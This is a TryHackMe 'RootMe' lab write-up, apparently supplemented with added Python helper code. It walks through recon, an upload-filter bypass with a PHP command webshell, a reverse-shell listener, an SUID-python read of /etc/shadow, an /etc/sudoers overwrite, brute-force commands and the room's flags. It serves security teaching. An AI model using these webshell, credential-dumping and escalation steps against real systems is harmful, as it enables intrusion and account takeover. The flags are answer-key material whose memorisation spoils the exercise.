# rootme

## <img src="https://2655899946-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fl8QcDIN52F6jN9Gr2mdt%2Fuploads%2FYsd0fjkYpXdkwZQLAtns%2Fimage.png?alt=media&#x26;token=3712aeef-fb62-4b52-8a35-4f5c6ba16b2c" alt="" data-size="line">ROOTME WRITEUP

#### *By Jacvbtaylor* <a href="#by_jacvbtaylor__1" id="by_jacvbtaylor__1"></a>

```
Used openvpn and Kali Linux
https://tryhackme.com/room/rrootme
completed August 30, 2022
```

## Step 1: <a href="#step_1_12" id="step_1_12"></a>

`nmap -sn -v 10.10.52.28 -oG - | awk '/Up$/{print $2}' >> livehosts.txt && nmap -v -A -iL livehosts.txt >> nmapscans.txt`

**This script I wrote does a ping sweep of the host (or of a whole subnet, if one is given) and writes the IPs that responded, i.e. the hosts that are up, to livehosts.txt. Nmap then reads that file and runs a full scan (`-A`: OS and version detection, default scripts and traceroute) against only the live hosts, appending the results to a second file, nmapscans.txt. It pays off most when scanning a network as opposed to a single machine, but I still like to use it.**

**Once I have established a good baseline of what is running and open on the target, I start a second scan that looks for known vulnerabilities in the detected service versions (the `vulners` script needs `-sV` for that) while I check out the rest of the open ports.**

`nmap -v -sV --script vulners 10.10.52.28 > vulnscan.txt`

**In this case, ports 22 and 80 are open. There is a web page on 10.10.52.28, but nothing to interact with on the index.**
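**The grepable (`-oG`) format that the first pipeline relies on is regular enough to parse properly instead of grepping for `Up$`. The following is an added Python example, not part of the original write-up: it reads a grepable transcript and pulls out the live hosts from the ping sweep and the open ports from the follow-up scan. `SAMPLE_OG` is constructed to look like the Step 1 scans (the real box only showed 22 and 80); it is not captured output.**

```python
"""Parse nmap grepable (-oG) output into live hosts and their open ports.

Added example, not from the original write-up.  SAMPLE_OG is a constructed
-oG transcript shaped like the Step 1 scans; it was not captured from the
target.
"""
import re

# Constructed sample of `nmap -oG -` output: a ping-sweep "Status:" line per
# host, then a "Ports:" line for the host that was scanned in depth.
SAMPLE_OG = """\
# Nmap 7.92 scan initiated as: nmap -sn -v -oG - 10.10.52.0/24
Host: 10.10.52.28 ()\tStatus: Up
Host: 10.10.52.29 ()\tStatus: Down
Host: 10.10.52.28 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.6p1/, 80/open/tcp//http//Apache httpd 2.4.29/, 443/closed/tcp//https///\tIgnored State: filtered (997)
# Nmap done at Tue Aug 30 20:01:12 2022 -- 256 IP addresses (1 host up) scanned in 3.02 seconds
"""

def live_hosts(og_text):
    """Hosts whose sweep line ends in 'Up' (what the awk '/Up$/' selects)."""
    hosts = []
    for line in og_text.splitlines():
        m = re.match(r"Host: (\S+) .*\tStatus: Up$", line)
        if m and m.group(1) not in hosts:
            hosts.append(m.group(1))
    return hosts

def open_ports(og_text):
    """Map host -> [(port, proto, service)] for every port in state 'open'."""
    result = {}
    for line in og_text.splitlines():
        m = re.match(r"Host: (\S+) .*\tPorts: ([^\t]*)", line)
        if not m:
            continue
        host, ports_field = m.group(1), m.group(2)
        for entry in ports_field.split(","):
            # -oG port entry: port/state/proto/owner/service/rpc/version/
            fields = entry.strip().split("/")
            if len(fields) >= 5 and fields[1] == "open":
                result.setdefault(host, []).append(
                    (int(fields[0]), fields[2], fields[4]))
    return result

if __name__ == "__main__":
    print("live:", live_hosts(SAMPLE_OG))
    print("open:", open_ports(SAMPLE_OG))
```

**Fed the real `-oG` output of both scans, this gives the same list the `awk '/Up$/'` step does, plus a per-host port table you can hand to the next tool without re-parsing normal nmap output.**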

## Step 2: <a href="#step_2_24" id="step_2_24"></a>

**I tried running a directory attack using dirb, with no luck. I stopped it after about 10 minutes to switch to this**

`gobuster dir -u http://10.10.52.28 -w /usr/share/wordlists/dirb/common.txt`

**which resulted in a much faster and successful outcome. With this, I can gravitate toward the status 301 results.**

```
/.hta                 (Status: 403) [Size: 276]
/.htpasswd            (Status: 403) [Size: 276]
/.htaccess            (Status: 403) [Size: 276]
/css                  (Status: 301) [Size: 308] [--> http://10.10.52.28/css/]
/index.php            (Status: 200) [Size: 616]
/js                   (Status: 301) [Size: 307] [--> http://10.10.52.28/js/]
/panel                (Status: 301) [Size: 310] [--> http://10.10.52.28/panel/]
/server-status        (Status: 403) [Size: 276]
/uploads              (Status: 301) [Size: 312] [--> http://10.10.52.28/uploads/]
```

**Browsing to** [**http://10.10.52.28/panel/**](http://10.10.52.28/panel/) **brings me to a page where I can upload files. I tested this out with a random txt file from my machine. I uploaded it and changed my URL to** [**http://10.10.52.28/uploads**](http://10.10.52.28/uploads) **which showed me an index of the files in that folder.**

## Step 3: <a href="#step_3_46" id="step_3_46"></a>

**This has a lot of potential, but while I tried to exploit it, I ran a brute force against the SSH port in case I could discover an existing username and password:**

`hydra -L /usr/share/metasploit-framework/data/wordlists/namelist.txt -P /usr/share/wordlists/rockyou.txt ssh://10.10.52.28 -v -F -t 4`

**While this ran in the background, I began to think about the kind of files I could upload.**

**I started by creating a PHP file called cmd.php:**

```
<?php
  // Takes the command from the ?cmd= query parameter and runs it on the server.
  $command = $_GET['cmd'];
  // system() writes the command's output straight into the response and returns
  // its last line; echo then prints that line again, which is why every result
  // below ends with a repeated final line (e.g. "www-data www-data").
  echo system($command);
?>
```

## Step 4: <a href="#step_4_60" id="step_4_60"></a>

**The server responded with a message saying PHP is prohibited.**

**I uploaded the same file renamed to cmd.php.jpg and it uploaded successfully, but the code does not execute with that extension, so my next step was to figure out if there are other valid extensions that will allow PHP to run.**
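**Why a rename is enough here, as an added Python example that is not code from the write-up or from the room: the panel's real filter is not visible on the page, so `BLACKLIST` is an assumption about a check that rejects `cmd.php` yet accepts `cmd.php.jpg` and `cmd.phtml`. `PHP_HANDLER` is the real `FilesMatch` pattern from Ubuntu's `/etc/apache2/mods-available/php7.x.conf`, which hands any file whose last extension is `.php`, `.phar` or `.phtml` to the PHP module. The gap between a suffix blacklist and that handler pattern is the bug; `allowlist_allows` is the check a panel should use instead.**

```python
"""Upload-filter bypass by alternate PHP extension: vulnerable vs hardened.

Added example, not code from the write-up or the room.  BLACKLIST is an
assumed filter (the panel's real one is not shown).  PHP_HANDLER is the
FilesMatch pattern Ubuntu's php7.x Apache module configuration ships with.
"""
import re

# Assumed upload filter: only the exact ".php" suffix is refused.
BLACKLIST = (".php",)

# <FilesMatch ".+\.ph(ar|p|tml)$">  SetHandler application/x-httpd-php
# Only the *last* extension is tested, so cmd.php.jpg is served as a plain
# file while cmd.phtml is executed.
PHP_HANDLER = re.compile(r".+\.ph(ar|p|tml)$")

# Hardened filter: the final extension must be one of these.
ALLOWLIST = {"jpg", "jpeg", "png", "gif"}

def blacklist_allows(filename):
    """Vulnerable check: blocks only names ending in '.php'."""
    return not filename.lower().endswith(BLACKLIST)

def apache_executes(filename):
    """Would Apache route this file to the PHP handler?"""
    return PHP_HANDLER.match(filename) is not None

def triage(filename):
    """(accepted by the weak filter?, executed by Apache once uploaded?)"""
    accepted = blacklist_allows(filename)
    return accepted, accepted and apache_executes(filename)

def allowlist_allows(filename):
    """Hardened check: final extension must be in ALLOWLIST, and no inner
    extension may be a PHP one either (AddHandler-style configs honour inner
    extensions, so cmd.php.jpg is refused as well)."""
    parts = filename.lower().split(".")
    if len(parts) < 2 or parts[-1] not in ALLOWLIST:
        return False
    return not any(re.fullmatch(r"ph(ar|p\d?|tml)", p) for p in parts[1:-1])

if __name__ == "__main__":
    for name in ("cmd.php", "cmd.php.jpg", "cmd.phtml", "photo.jpg"):
        print("%-12s weak filter -> %-14s allowlist -> %s"
              % (name, triage(name), allowlist_allows(name)))
```

**Renaming the stored file to a server-generated name with the validated extension removes the remaining risk from the uploads directory listing as well; the allowlist alone only controls what gets executed.**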

**I changed the name to cmd.phtml, uploaded, visited the url** [**http://10.10.52.28/uploads/cmd.phtml**](http://10.10.52.28/uploads/cmd.phtml) **and was greeted with a blank page.**

**It worked! Next step is to test commands.**

<http://10.10.52.28/uploads/cmd.phtml?cmd=ls>

```
cmd.php.jpg cmd.phtml eth0.txt eth0.txt
```

<http://10.10.52.28/uploads/cmd.phtml?cmd=whoami>

```
www-data www-data
```

## Step 5: <a href="#step_5_80" id="step_5_80"></a>

**Next step is to try and run some longer commands. I first URL-encoded `cd ../../../ && ls`:**

[http://10.10.52.28/uploads/cmd.phtml?cmd=cd ../../../ && ls](http://10.10.52.28/uploads/cmd.phtml?cmd=cd%20..%2F..%2F..%2F%20%26%26%20ls)

```
backups cache crash lib local lock log mail opt run snap spool tmp www www
```

[http://10.10.52.28/uploads/cmd.phtml?cmd=cat %2Fetc%2Fpasswd](http://10.10.52.28/uploads/cmd.phtml?cmd=cat%20%2Fetc%2Fpasswd)

```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
rootme:x:1000:1000:RootMe:/home/rootme:/bin/bash
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
test:x:1001:1001:,,,:/home/test:/bin/bash
test:x:1001:1001:,,,:/home/test:/bin/bash
```

**This was a lot of info, so to simplify, I ran**

[http://10.10.52.28/uploads/cmd.phtml?cmd=cat /etc/passwd | awk -F ":" '{print$1}'](http://10.10.52.28/uploads/cmd.phtml?cmd=cat%20%2Fetc%2Fpasswd%20%7C%20awk%20-F%20%22%3A%22%20%27%7Bprint%241%7D%27)

```
root daemon bin sys sync games man lp mail news uucp proxy www-data backup list irc gnats nobody systemd-network systemd-resolve syslog messagebus _apt lxd uuidd dnsmasq landscape pollinate rootme sshd test test
```

## Step 6: <a href="#step_6_99" id="step_6_99"></a>

**This output all of the users on the server. This may come in handy for the SSH brute force, but we can still maybe exploit the server more through the file upload. Maybe a PHP reverse shell?**

**Before trying that, I stopped my SSH brute force and changed the command to use a valid username:**

`hydra -l rootme -P /usr/share/wordlists/rockyou.txt ssh://10.10.52.28 -v -F -t 4`

**Again, I am going to let this run while I explore more options.**

**The last thing I wanted to try with the URL commands was to find out who the sudo users are:**

[http://10.10.52.28/uploads/cmd.phtml?cmd=getent group | grep sudo](http://10.10.52.28/uploads/cmd.phtml?cmd=getent%20group%20%7C%20grep%20sudo%20)

```
sudo:x:27:rootme sudo:x:27:rootme
```
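**Reading these responses by eye works for one box, but the output has a quirk worth handling: the cmd.phtml shell does `echo system($cmd)`, and `system()` already prints the command output and returns its last line, which `echo` prints a second time (hence `www-data www-data` and the repeated `test` line). The following added Python example, not code from the write-up, strips that duplicate and then reduces the `/etc/passwd` and `getent group` responses to the two lists that matter: accounts with a real login shell (the only names worth giving hydra) and the members of `sudo`. `PASSWD` and `GROUP` are excerpts of the page's own responses, embedded as constructed test input.**

```python
"""Reduce raw webshell responses to login users and sudo members.

Added example, not code from the write-up.  PASSWD and GROUP are excerpts
of the page's own responses, kept exactly as the echo system() shell returns
them (repeated final line included), used here as constructed test input.
"""

# Excerpt of the /etc/passwd response, as returned by the shell.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
pollinate:x:109:1::/var/cache/pollinate:/bin/false
rootme:x:1000:1000:RootMe:/home/rootme:/bin/bash
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
test:x:1001:1001:,,,:/home/test:/bin/bash
test:x:1001:1001:,,,:/home/test:/bin/bash"""

# The `getent group | grep sudo` response, also with its echoed last line.
GROUP = "sudo:x:27:rootme\nsudo:x:27:rootme"

def strip_echoed_last_line(body):
    """Undo the `echo system()` duplication: drop the final line when it is
    an exact copy of the line before it."""
    lines = body.split("\n")
    if len(lines) >= 2 and lines[-1] == lines[-2]:
        lines.pop()
    return "\n".join(lines)

def login_users(passwd_text):
    """Accounts whose 7th field is a real shell (name ends in 'sh'), which
    rules out /usr/sbin/nologin, /bin/false and /bin/sync."""
    users = []
    for line in strip_echoed_last_line(passwd_text).splitlines():
        f = line.split(":")
        if len(f) == 7 and f[6].endswith("sh") and f[0] not in users:
            users.append(f[0])
    return users

def group_members(group_text, group):
    """Members from the 4th field of the matching /etc/group line."""
    for line in strip_echoed_last_line(group_text).splitlines():
        f = line.split(":")
        if len(f) == 4 and f[0] == group:
            return [m for m in f[3].split(",") if m]
    return []

if __name__ == "__main__":
    print("login users:", login_users(PASSWD))
    print("sudo members:", group_members(GROUP, "sudo"))
```

**On this box that leaves three candidates for SSH (root, rootme, test) and confirms rootme is the one with sudo, which is exactly the username the brute force was narrowed to in Step 6.**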

## Step 7: <a href="#step_7_118" id="step_7_118"></a>

**Now to create a reverse shell. I made a new .phtml file containing Pentest Monkey's PHP reverse shell, uploaded it through the panel page, and ran this on my machine to open the firewall and start a listener before requesting the file in the browser (the listener port and the allowed port must match; the connection below arrives on 4334):**

`ufw allow from 10.10.52.28 proto tcp to any port 4334 && nc -lnvp 4334`

**It worked!**

> listening on \[any] 4334 …\
> connect to \[10.2.12.19] from (UNKNOWN) \[10.10.52.28] 52082\
> Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86\_64 x86\_64 x86\_64 GNU/Linux\
> 21:33:01 up 1:41, 0 users, load average: 0.00, 0.01, 0.00\
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT\
> uid=33(www-data) gid=33(www-data) groups=33(www-data)\
> /bin/sh: 0: can’t access tty; job control turned off\
> `$ whoami`\
> www-data

## Step 8: <a href="#step_8_137" id="step_8_137"></a>

**Now comes the hard part. This is my first time being stuck as the www-data user, who has no sudo privileges. After some research, I came across the possibility of an SUID escalation. To list the files with the SUID bit set, I ran this:**

`$ find / -perm -u=s -type f 2>/dev/null`\
/usr/lib/dbus-1.0/dbus-daemon-launch-helper\
/usr/lib/snapd/snap-confine\
/usr/lib/x86\_64-linux-gnu/lxc/lxc-user-nic\
/usr/lib/eject/dmcrypt-get-device\
/usr/lib/openssh/ssh-keysign\
/usr/lib/policykit-1/polkit-agent-helper-1\
/usr/bin/traceroute6.iputils\
/usr/bin/newuidmap\
/usr/bin/newgidmap\
/usr/bin/chsh\
/usr/bin/python\
/usr/bin/at\
/usr/bin/chfn\
/usr/bin/gpasswd\
/usr/bin/sudo\
/usr/bin/newgrp\
/usr/bin/passwd\
/usr/bin/pkexec\
/snap/core/8268/bin/mount\
/snap/core/8268/bin/ping\
/snap/core/8268/bin/ping6\
/snap/core/8268/bin/su\
/snap/core/8268/bin/umount\
/snap/core/8268/usr/bin/chfn\
/snap/core/8268/usr/bin/chsh\
/snap/core/8268/usr/bin/gpasswd\
/snap/core/8268/usr/bin/newgrp\
/snap/core/8268/usr/bin/passwd\
/snap/core/8268/usr/bin/sudo\
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper\
/snap/core/8268/usr/lib/openssh/ssh-keysign\
/snap/core/8268/usr/lib/snapd/snap-confine\
/snap/core/8268/usr/sbin/pppd\
/snap/core/9665/bin/mount\
/snap/core/9665/bin/ping\
/snap/core/9665/bin/ping6\
/snap/core/9665/bin/su\
/snap/core/9665/bin/umount\
/snap/core/9665/usr/bin/chfn\
/snap/core/9665/usr/bin/chsh\
/snap/core/9665/usr/bin/gpasswd\
/snap/core/9665/usr/bin/newgrp\
/snap/core/9665/usr/bin/passwd\
/snap/core/9665/usr/bin/sudo\
/snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper\
/snap/core/9665/usr/lib/openssh/ssh-keysign\
/snap/core/9665/usr/lib/snapd/snap-confine\
/snap/core/9665/usr/sbin/pppd\
/bin/mount\
/bin/su\
/bin/fusermount\
/bin/ping\
/bin/umount

**Using the output of the last command, I cross-referenced the list against** [**https://gtfobins.github.io/#+suid**](https://gtfobins.github.io/#+suid)**. To make the cross-reference a little easier, I spent way too long sorting the information with this script, which puts the file names I need to read MOSTLY in alphabetical order:**

`find / -perm -u=s -type f 2>/dev/null | sed -e 's/snap\/core//g;s/\/9//g;s/\/6//;s/bin//;s/\/8//g' | awk -F "/" '{print$3,$4,$5}' | sed -e 's/usr//;s/lib//g' | sort`
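**The noise in that list is mostly the same binaries appearing once per installed snap core revision (8268 and 9665). The following added Python example, not the author's sed/awk one-liner, folds those duplicates away, groups the paths by binary name, and intersects the names with a GTFOBins SUID list. `FIND_OUTPUT` is an abbreviated copy of the page's own `find` output; `GTFOBINS_SUID` is a hand-copied, deliberately partial subset of what GTFOBins lists under SUID, so treat it as a starting point and check the live page.**

```python
"""Normalise `find / -perm -u=s` output and cross-check it against GTFOBins.

Added example, not the author's one-liner.  FIND_OUTPUT is an abbreviated
copy of the page's SUID list.  GTFOBINS_SUID is a hand-copied, partial subset
of https://gtfobins.github.io/#+suid and is not authoritative.
"""
import re
from collections import OrderedDict

FIND_OUTPUT = """\
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/bin/python
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/pkexec
/snap/core/8268/bin/mount
/snap/core/8268/bin/su
/snap/core/8268/usr/bin/passwd
/snap/core/9665/bin/mount
/snap/core/9665/bin/su
/snap/core/9665/usr/bin/passwd
/bin/mount
/bin/su
/bin/fusermount
/bin/ping
"""

GTFOBINS_SUID = {
    "bash", "python", "perl", "php", "find", "vim", "nano", "less", "more",
    "env", "awk", "cp", "mv", "tee", "dd", "nmap", "strace", "gdb", "xxd",
}

# /snap/<name>/<revision>/...: the same binary appears once per installed
# revision, so the revision number is folded away before grouping.
SNAP_PREFIX = re.compile(r"^/snap/[^/]+/\d+")

def by_binary(find_output):
    """Map basename -> paths, in order of first appearance, with all snap
    revisions collapsed into one '/snap/<rev>/...' entry."""
    table = OrderedDict()
    for path in find_output.splitlines():
        path = path.strip()
        if not path:
            continue
        path = SNAP_PREFIX.sub("/snap/<rev>", path)
        name = path.rsplit("/", 1)[-1]
        paths = table.setdefault(name, [])
        if path not in paths:
            paths.append(path)
    return table

def gtfobins_hits(find_output, known=GTFOBINS_SUID):
    """Basenames that are SUID on the box and have a GTFOBins SUID entry."""
    return sorted(name for name in by_binary(find_output) if name in known)

if __name__ == "__main__":
    for name, paths in by_binary(FIND_OUTPUT).items():
        print("%-28s %s" % (name, ", ".join(paths)))
    print("GTFOBins SUID hits:", gtfobins_hits(FIND_OUTPUT))
```

**Run against the full list above it reports a single hit, `python`, which is the conclusion Step 9 reaches by hand. The snap copies of `su`, `passwd` and `mount` are the standard SUID set every Ubuntu system carries and are not escalation paths by themselves.**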

## Step 9: <a href="#step_9_202" id="step_9_202"></a>

**Python seems to be the only match that has SUID privileges. I loaded a shell using Python:**

`$ whoami`\
www-data\
`$ su rootme`\
su: must be run from a terminal\
`$ python -c 'import os; os.system("/bin/sh")'`

**Same outcome as the reverse PHP shell. Still stuck as the www-data user for now.**

> `whoami`\
> www-data\
> `id`\
> uid=33(www-data) gid=33(www-data) groups=33(www-data)\
> `su`\
> su: must be run from a terminal\
> `su rootme`\
> su: must be run from a terminal

## Step 10: <a href="#step_10_224" id="step_10_224"></a>

**Referencing** [**https://rastating.github.io/privilege-escalation-via-python-library-hijacking/**](https://rastating.github.io/privilege-escalation-via-python-library-hijacking/) **it seems there may be a possibility of hijacking a library. This seems promising, but only if I can find a cron job run by root and a file or folder on Python's module search path that I can write to.**

`python -c 'import sys; print "\n".join(sys.path)'`

> /usr/lib/python2.7\
> /usr/lib/python2.7/plat-x86\_64-linux-gnu\
> /usr/lib/python2.7/lib-tk\
> /usr/lib/python2.7/lib-old\
> /usr/lib/python2.7/lib-dynload\
> /usr/local/lib/python2.7/dist-packages\
> /usr/lib/python2.7/dist-packages

**After trying what felt like everything, I was finally able to read the shadow file with this Python one-liner; because /usr/bin/python has the SUID bit, it opens the file with root's effective UID:**

`python -c 'print(open("/etc/shadow").read())'`

```
root:$6$5osB44J2$24WV3zAR1FTqEq3f2kSqrigUgyDmKucU8rwHvbOJWxIoWSlHbVHV1Ug1eOHqidieZWDU3Y5V3cimChun2JYNw1:18478:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
rootme:$6$jzeDDmrVeqMMEQqv$j8jwWy951YwWBJWzQNn.A45I.8H06/QOv4qocX.hNDdT42NytyavSHxlxoEh0ek2OS4NX27tuuZRTJuHPSWCp.:18478:0:99999:7:::
sshd:*:18478:0:99999:7:::
test:$6$vXOyvOWZ$UpIjnJq/KuKmKHezW/pEM.nrI6QuqhWWlv/fUmLvJI1YG7nju2vpP3vg1Q0SSf5FCk8058WD5Rc3XXPMRlqHb0:18478:0:99999:7:::
```

## Step 11: <a href="#step_11_276" id="step_11_276"></a>

`python -c 'print(open("/etc/shadow").read())' | awk -F ":" 'NF > 1 && $2 !~ /^[*!]/ {print $1, $2}' > hashes`

`ls`\
hashes\
`cat hashes`

```
root $6$5osB44J2$24WV3zAR1FTqEq3f2kSqrigUgyDmKucU8rwHvbOJWxIoWSlHbVHV1Ug1eOHqidieZWDU3Y5V3cimChun2JYNw1
rootme $6$jzeDDmrVeqMMEQqv$j8jwWy951YwWBJWzQNn.A45I.8H06/QOv4qocX.hNDdT42NytyavSHxlxoEh0ek2OS4NX27tuuZRTJuHPSWCp.
test $6$vXOyvOWZ$UpIjnJq/KuKmKHezW/pEM.nrI6QuqhWWlv/fUmLvJI1YG7nju2vpP3vg1Q0SSf5FCk8058WD5Rc3XXPMRlqHb0
```

`sed 's/ /:/g' hashes > userhash`\
`cat userhash`

```
root:$6$5osB44J2$24WV3zAR1FTqEq3f2kSqrigUgyDmKucU8rwHvbOJWxIoWSlHbVHV1Ug1eOHqidieZWDU3Y5V3cimChun2JYNw1
rootme:$6$jzeDDmrVeqMMEQqv$j8jwWy951YwWBJWzQNn.A45I.8H06/QOv4qocX.hNDdT42NytyavSHxlxoEh0ek2OS4NX27tuuZRTJuHPSWCp.
test:$6$vXOyvOWZ$UpIjnJq/KuKmKHezW/pEM.nrI6QuqhWWlv/fUmLvJI1YG7nju2vpP3vg1Q0SSf5FCk8058WD5Rc3XXPMRlqHb0
```

**I got the password hashes! I thought this was going to be smooth sailing from here, but I thought wrong. I tried using John the Ripper to crack any of the 3 password hashes I collected, but still no luck.**
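**The hand-built `userhash` file above is already what John expects (`john --format=sha512crypt userhash`; the `$6$` prefix identifies sha512crypt, hashcat mode 1800). The following added Python example, not from the write-up, does the same extraction without the awk/sed chain and names the format to pass to the cracker. `SHADOW` is an excerpt of the page's own dump plus one constructed `locked` entry with a `!`-prefixed hash, to show how a locked account is handled: such a hash is unusable for login but is still crackable offline once the `!` is stripped.**

```python
"""Pull the crackable entries out of /etc/shadow and name their hash type.

Added example, not part of the write-up.  SHADOW is an excerpt of the page's
own dump plus one constructed entry ('locked', not a real hash) used as
test input.
"""

SHADOW = """\
root:$6$5osB44J2$24WV3zAR1FTqEq3f2kSqrigUgyDmKucU8rwHvbOJWxIoWSlHbVHV1Ug1eOHqidieZWDU3Y5V3cimChun2JYNw1:18478:0:99999:7:::
daemon:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
rootme:$6$jzeDDmrVeqMMEQqv$j8jwWy951YwWBJWzQNn.A45I.8H06/QOv4qocX.hNDdT42NytyavSHxlxoEh0ek2OS4NX27tuuZRTJuHPSWCp.:18478:0:99999:7:::
sshd:*:18478:0:99999:7:::
test:$6$vXOyvOWZ$UpIjnJq/KuKmKHezW/pEM.nrI6QuqhWWlv/fUmLvJI1YG7nju2vpP3vg1Q0SSf5FCk8058WD5Rc3XXPMRlqHb0:18478:0:99999:7:::
locked:!$6$c0nstructed$thisIsNotARealHashJustAnExampleValue0000000000000000000000000000000000:18478:0:99999:7:::
"""

# crypt(3) "$id$" prefix -> (John --format name, hashcat -m mode)
HASH_TYPES = {
    "$1$": ("md5crypt", 500),
    "$2a$": ("bcrypt", 3200),
    "$2b$": ("bcrypt", 3200),
    "$2y$": ("bcrypt", 3200),
    "$5$": ("sha256crypt", 7400),
    "$6$": ("sha512crypt", 1800),
}

def crackable_entries(shadow_text, include_locked=False):
    """Return [(user, hash)] for accounts that carry a real hash.

    '*' and a bare '!' mean no password is set.  A hash prefixed with '!' is
    a locked account; it cannot be used to log in, but the hash behind the
    '!' is still valid for offline cracking, so it is returned (with the
    '!' removed) when include_locked is True.
    """
    out = []
    for line in shadow_text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, pw = fields[0], fields[1]
        if pw.startswith("!") and include_locked:
            pw = pw.lstrip("!")
        if not pw or pw[0] in "*!":
            continue
        out.append((user, pw))
    return out

def hash_type(pw):
    """(John format, hashcat mode) from the '$id$' prefix, or None."""
    for prefix, info in HASH_TYPES.items():
        if pw.startswith(prefix):
            return info
    return None

def john_file(shadow_text, include_locked=False):
    """'user:hash' lines, the layout the write-up built by hand as userhash."""
    entries = crackable_entries(shadow_text, include_locked)
    return "".join("%s:%s\n" % (u, h) for u, h in entries)

if __name__ == "__main__":
    for user, pw in crackable_entries(SHADOW, include_locked=True):
        print(user, hash_type(pw))
    print(john_file(SHADOW), end="")
```

**Feed `john_file(...)` to John with the format `hash_type` reports; sha512crypt with the default 5000 rounds is slow, so a three-hash rockyou run not finishing quickly, as the author saw, is expected rather than a sign the hashes are wrong.**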

## Step 12: <a href="#step_12_298" id="step_12_298"></a>

**I thought back to what I had done to even get that information in the first place. I used Python to open a file, so what's stopping me from writing to one?**

`python -c 'open("/etc/sudoers","w+").write("www-data ALL=(ALL) NOPASSWD:ALL")'`\
`sudo -i`\
mesg: ttyname failed: Inappropriate ioctl for device\
`su`\
`whoami`\
root\
`passwd www-data`\
Enter new UNIX password: test\
Retype new UNIX password: test\
passwd: password updated successfully

**I finally moved up a user! (Note that opening /etc/sudoers with mode `w+` truncates it, so that single line replaced every rule the file held before.) The PHP shell we are still operating from is limited to certain commands, so I tried my best to get an SSH login with my www-data user, but kept getting kicked out after logging in. The reason is in the /etc/passwd output above: www-data's login shell is /usr/sbin/nologin, which prints "This account is currently not available." and closes the connection.**

> ┌──(root㉿kali)-\[/home/kali/rootme]\
> └─# `ssh www-data@10.10.52.28 -p 22`\
> www-data@10.10.52.28's password:\
> Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86\_64)\
> System information as of Wed Aug 31 00:06:05 UTC 2022\
> System load: 0.11 Processes: 115\
> Usage of /: 20.5% of 19.56GB Users logged in: 0\
> Memory usage: 44% IP address for eth0: 10.10.52.28\
> Swap usage: 0%\
> Last login: Wed Aug 31 00:05:41 2022 from 10.2.12.19\
> This account is currently not available.\
> Connection to 10.10.52.28 closed.\
> ┌──(root㉿kali)-\[/home/kali/rootme]\
> └─#

## Step 13: <a href="#step_13_335" id="step_13_335"></a>

**Oh well. Going back to the PHP shell, I located the user.txt file in /var/www**

```
THM{y0u_g0t_a_sh3ll}
```

**Lastly, I needed to locate the root.txt file**

`pwd`\
/root\
`ls`\
root.txt\
`cat root.txt`

```
THM{pr1v1l3g3_3sc4l4t10n}
```
